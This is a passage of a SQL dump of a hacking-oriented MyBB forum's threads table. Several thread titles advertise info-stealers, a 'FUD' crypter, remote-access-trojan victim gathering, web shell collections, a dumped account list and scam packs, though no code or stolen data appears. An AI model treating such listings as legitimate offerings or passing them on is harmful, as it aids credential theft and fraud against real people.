'1', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('553', '61', 'How to Control Coke Machines (Tutorial)', '0', '0', '0', '82', 'iTzIpod', '1348869149', '2761', '1348869149', 'iTzIpod', '82', '2', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('554', '61', 'eBook ($4/Day)', '0', '0', '0', '82', 'iTzIpod', '1348869361', '2762', '1348869361', 'iTzIpod', '82', '1', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('555', '61', 'Apple Method', '0', '0', '0', '82', 'iTzIpod', '1348869508', '2763', '1348869508', 'iTzIpod', '82', '1', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('556', '61', 'Free Skype IP Resolver - WebBased', '0', '0', '0', '82', 'iTzIpod', '1348869725', '2764', '1348869725', 'iTzIpod', '82', '1', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('557', '61', '? ? MASSIVE COLLECTION OF HQ AND USEFUL EBOOKS & TUTORIALS ? ?', '0', '0', '0', '82', 'iTzIpod', '1348869795', '2765', '1348869795', 'iTzIpod', '82', '2', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('558', '33', 'Guess this font?', '0', '0', '0', '82', 'iTzIpod', '1348883452', '2769', '1348971058', 'iTzIpod', '82', '9', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('559', '3', 'Upgrade Price Lowered', '0', '0', '0', '1', 't3h jok3r', '1348890531', '2781', '1348968969', 'Timmy', '5', '14', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('560', '24', 'Windows 7 Official direct downloads', '0', '0', '0', '205', 'mothered', '1348895056', '2788', '1349006238', 'mothered', '205', '4', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('561', '24', 'What Antivirus are you running and why?', '0', '0', '0', '205', 'mothered', '1348895341', '2790', '1348970122', 'Timmy', '5', '8', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('562', '7', 'World\'s Longest Email Address', '0', '0', '0', '205', 'mothered', '1348895544', '2791', '1348970181', 'Timmy', '5', '9', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('563', '25', 'Virus Removal Tools', '0', '0', '0', '205', 'mothered', '1348895920', '2792', '1349928356', 'mothered', '205', '12', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('564', '7', 'What Do You Do To Relax?', '0', '0', '0', '205', 'mothered', '1348896086', '2793', '1349049010', 'iTzIpod', '82', '26', '9', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('566', '16', 'Free Xbox360 Points/XBL Gold Method', '0', '0', '0', '82', 'iTzIpod', '1348932963', '2810', '1348932963', 'iTzIpod', '82', '1', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('565', '20', '[FREE] CHROME CRYPTER | FUD [FREE]', '0', '0', '0', '100', '??zg???g????61', '1348925569', '2806', '1350903009', '??zg???g????61', '100', '40', '10', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('567', '16', 'How to SE McDonalds', '0', '0', '0', '82', 'iTzIpod', '1348933081', '2811', '1349523198', 'iTzIpod', '82', '6', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('568', '61', '500+ pictures of same girl E-Whore pack', '0', '0', '0', '82', 'iTzIpod', '1348933347', '2812', '1348933347', 'iTzIpod', '82', '2', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('569', '74', '21,000 Minecraft Account Dump', '0', '0', '0', '82', 'iTzIpod', '1348933647', '2813', '1350157505', 'iTzIpod', '82', '25', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('570', '61', 'Adf.ly + Adfoc.us Bot', '0', '0', '0', '82', 'iTzIpod', '1348933809', '2814', '1348933809', 'iTzIpod', '82', '4', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('571', '61', 'Skype Resolver|Domain Resolver|Pinger|Skype Spam Bot|Mass Messeger All In One!', '0', '0', '0', '82', 'iTzIpod', '1348933887', '2815', '1348933887', 'iTzIpod', '82', '2', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('572', '61', 'Another Webbased Skype IP Resolver', '0', '0', '0', '82', 'iTzIpod', '1348933993', '2816', '1348933993', 'iTzIpod', '82', '1', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('573', '61', 'Free Skype API Source', '0', '0', '0', '82', 'iTzIpod', '1348934091', '2817', '1348934091', 'iTzIpod', '82', '1', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('574', '61', 'Clean Thread Design', '0', '0', '0', '82', 'iTzIpod', '1348934403', '2818', '1349090000', 'iTzIpod', '82', '9', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('575', '61', 'Free Ultimate Design Pack Size 2.4GB+', '0', '0', '0', '82', 'iTzIpod', '1348934483', '2819', '1348934483', 'iTzIpod', '82', '2', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('576', '15', 'The Ultimate HACK PACK', '0', '0', '0', '203', 'NeonLights', '1348949612', '2828', '1348961185', 'NXK', '61', '35', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('577', '61', '1,000+ Shells', '0', '0', '0', '82', 'iTzIpod', '1348949964', '2829', '1348949964', 'iTzIpod', '82', '3', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('578', '61', 'Fresh Shells', '0', '0', '0', '82', 'iTzIpod', '1348950041', '2830', '1348950041', 'iTzIpod', '82', '5', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('579', '61', '3000 Shells (Private and Public)', '0', '0', '0', '82', 'iTzIpod', '1348950196', '2831', '1348950196', 'iTzIpod', '82', '5', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('580', '61', '500+ Fresh Elite Proxies', '0', '0', '0', '82', 'iTzIpod', '1348950351', '2832', '1348950351', 'iTzIpod', '82', '2', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('581', '15', '[CRACKED] Zemana AntiLogger 1.9.3.208 [WITH UPDATES]', '0', '0', '0', '203', 'NeonLights', '1348954819', '2834', '1348954819', 'NeonLights', '203', '4', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('582', '15', 'RobotStealer Free Stealer', '0', '0', '0', '203', 'NeonLights', '1348954936', '2835', '1348970063', 'NeonLights', '203', '12', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('583', '17', '500+ pictures of same girl E-Whore pack', '0', '0', '0', '82', 'iTzIpod', '1348960805', '2844', '1348970550', 'iTzIpod', '82', '14', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('584', '24', 'Windows 8, will you switch over?', '0', '0', '0', '205', 'mothered', '1348960856', '2846', '1349408547', 'p420', '9', '13', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('585', '24', 'Post your specs', '0', '0', '0', '205', 'mothered', '1348961210', '2848', '1348961210', 'mothered', '205', '2', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('586', '5', 'Mod code', '0', '0', '0', '61', 'NXK', '1348961238', '2849', '1348962075', 't3h jok3r', '1', '8', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('587', '65', 'Who likes the Rocky Films?', '0', '0', '0', '205', 'mothered', '1348961805', '2854', '1349049931', 'spacefish36', '8', '19', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('589', '15', 'Crime24 Stealer', '0', '0', '0', '203', 'NeonLights', '1348962837', '2861', '1349379022', 'NeonLights', '203', '65', '17', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('802', '77', 'MW3 Knockback Lobby | FREE', '0', '0', '0', '3', '??????????¢™', '1349913454', '4184', '1350149910', '??????????¢™', '3', '11', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('591', '21', 'Amicitia Bot Holder', '0', '0', '0', '203', 'NeonLights', '1348963275', '2863', '1348969911', 'NeonLights', '203', '15', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('593', '12', 'How To Get More Victims To Your Rat', '0', '0', '0', '203', 'NeonLights', '1348963872', '2867', '1348963872', 'NeonLights', '203', '9', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('592', '11', 'Lifehacker: The Guide to Working Smarter, Faster, and Better', '0', '3', '0', '203', 'NeonLights', '1348963578', '2865', '1348973167', 'NeonLights', '203', '11', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('594', '64', 'Noobroom (Online Movie Streaming Site)', '0', '0', '0', '82', 'iTzIpod', '1348964266', '2868', '1349820655', 'R?????zo?', '62', '14', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('595', '65', 'What movie did you watch recently?', '0', '0', '0', '1', 't3h jok3r', '1348965064', '2869', '1352206978', 'iTzIpod', '82', '66', '20', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('596', '3', '[Announcement]New forums added!', '0', '0', '0', '1', 't3h jok3r', '1348965311', '2871', '1348968812', 'Timmy', '5', '14', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('597', '3', '[Announcement]500 error solution', '0', '0', '0', '5', 'Timmy', '1348969292', '2886', '1348970616', 'Romdu62', '7', '9', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('598', '42', 'Top 10 donors of 2012 US election', '0', '0', '0', '7', 'Romdu62', '1348970798', '2908', '1348970798', 'Romdu62', '7', '3', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('599', '7', 'Someone refer the 200th Member', '0', '0', '0', '82', 'iTzIpod', '1348970816', '2909', '1349020020', 'iTzIpod', '82', '20', '5', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('600', '58', 'OMG HERE IT COMES!', '0', '0', '0', '1', 't3h jok3r', '1348971372', '2912', '1349026120', 'NXK', '61', '17', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('601', '3', 'Major Announcement by Jok3r!', '0', '0', '0', '1', 't3h jok3r', '1348972975', '2914', '1349142517', 't3h jok3r', '1', '68', '15', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('602', '63', '[Request] Sig and Avatar', '0', '0', '0', '3', '??????????¢™', '1348973049', '2915', '1349028112', 'R?????zo?', '62', '35', '9', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('603', '47', 'Custom Pastebin Source Code', '0', '0', '0', '3', '??????????¢™', '1348973990', '2922', '1350598755', '??????????¢™', '3', '100', '24', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('604', '61', 'Unique Sig and Header', '0', '0', '0', '3', '??????????¢™', '1348975430', '2928', '1349050960', 'iTzIpod', '82', '18', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('605', '64', 'Dredd 3D (2012) Movie RIP', '0', '0', '0', '5', 'Timmy', '1348976519', '2934', '1348977303', 't3h jok3r', '1', '6', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('606', '64', 'Forum Rules and Regulations', '0', '0', '0', '1', 't3h jok3r', '1348977158', '2935', '1348977158', 't3h jok3r', '1', '6', '0', '1', '1', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('607', '7', 'Wanna laugh?', '0', '0', '0', '10', 'swa4567', '1348980994', '2942', '1349325990', '??????????¢™', '3', '7', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('608', '66', 'Welcome To Gamers!', '0', '0', '0', '61', 'NXK', '1348983270', '2943', '1351110916', 'VirtualLegend', '228', '24', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('609', '58', 'Gamers Recruitment', '0', '0', '0', '61', 'NXK', '1348983476', '2944', 